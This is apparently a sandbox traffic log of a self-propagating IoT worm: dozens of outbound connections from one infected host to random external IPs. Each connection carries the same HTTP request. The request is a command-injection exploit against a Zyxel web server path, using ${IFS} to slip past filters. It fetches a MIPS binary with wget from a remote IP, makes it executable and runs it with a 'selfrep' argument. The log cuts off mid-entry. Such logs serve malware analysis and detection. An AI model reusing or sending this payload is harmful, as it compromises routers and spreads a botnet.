                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322890043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4102192.168.2.2347188113.105.73.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322947979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4103192.168.2.2343538118.102.40.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.322978020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4104192.168.2.2333804148.17.220.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323020935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4105192.168.2.233617077.104.49.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323055029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4106192.168.2.234573483.175.159.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323084116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4107192.168.2.2342614152.148.24.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323146105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4108192.168.2.233957642.209.198.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323189974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4109192.168.2.2347234206.164.18.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323225975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4110192.168.2.2342310202.143.211.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323280096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4111192.168.2.2357846160.163.197.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323326111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4112192.168.2.2353140116.149.198.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323332071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4113192.168.2.234916690.141.166.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323379993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4114192.168.2.2357094132.33.243.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323416948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4115192.168.2.2342578170.83.248.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323455095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4116192.168.2.2352356117.159.21.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323512077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4117192.168.2.2353806205.163.4.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323538065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4118192.168.2.2343418126.63.177.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323580027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4119192.168.2.236028864.159.110.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323635101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4120192.168.2.2356944158.143.222.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323668957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4121192.168.2.2351808180.153.99.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323736906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4122192.168.2.235380088.159.32.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323760033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4123192.168.2.2348952142.35.176.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323810101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4124192.168.2.2337652185.18.48.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323832989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4125192.168.2.2339554139.73.6.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323870897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4126192.168.2.2353836181.114.238.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323906898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4127192.168.2.2339800183.84.186.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323947906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4128192.168.2.2342480205.236.102.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.323982954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4129192.168.2.2345168174.62.219.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324023008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4130192.168.2.234542483.179.230.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324071884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4131192.168.2.2335524185.85.193.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324130058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4132192.168.2.2350922177.130.128.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324131012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4133192.168.2.2354252108.102.32.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324167967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4134192.168.2.235967234.61.67.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324235916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4135192.168.2.235253842.133.147.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324263096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4136192.168.2.234756690.216.74.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324318886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4137192.168.2.2347958154.124.96.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324340105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4138192.168.2.2353306199.81.154.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324384928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4139192.168.2.2348154216.118.187.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324425936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4140192.168.2.235312845.160.14.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324456930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4141192.168.2.2357228153.28.173.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324471951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4142192.168.2.2337974135.178.59.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324537039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4143192.168.2.2352364186.95.245.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324588060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4144192.168.2.2339488154.119.96.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324618101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4145192.168.2.233910663.142.255.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324676037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4146192.168.2.2358468130.243.1.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324713945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4147192.168.2.2357910202.246.208.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324759007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4148192.168.2.234965241.145.178.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324805975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4149192.168.2.235449263.7.181.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324860096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4150192.168.2.233325295.250.152.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324888945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4151192.168.2.2354178219.198.46.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324939013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4152192.168.2.2350540202.65.109.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.324971914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4153192.168.2.2349552123.248.193.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325050116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4154192.168.2.2340404217.31.66.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325073004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4155192.168.2.2340472198.179.221.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325134993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4156192.168.2.2336488123.26.87.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325170994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4157192.168.2.2337164210.223.171.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325202942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4158192.168.2.233644463.90.115.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325254917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4159192.168.2.234484050.239.16.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325278997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4160192.168.2.2342166202.169.24.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325324059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4161192.168.2.234378059.52.154.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325366974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4162192.168.2.2359678186.82.202.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325408936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4163192.168.2.234135065.232.88.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325437069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4164192.168.2.2352532103.141.75.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325465918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4165192.168.2.2338692101.245.60.141443
                                                TimestampBytes transferredDirectionData
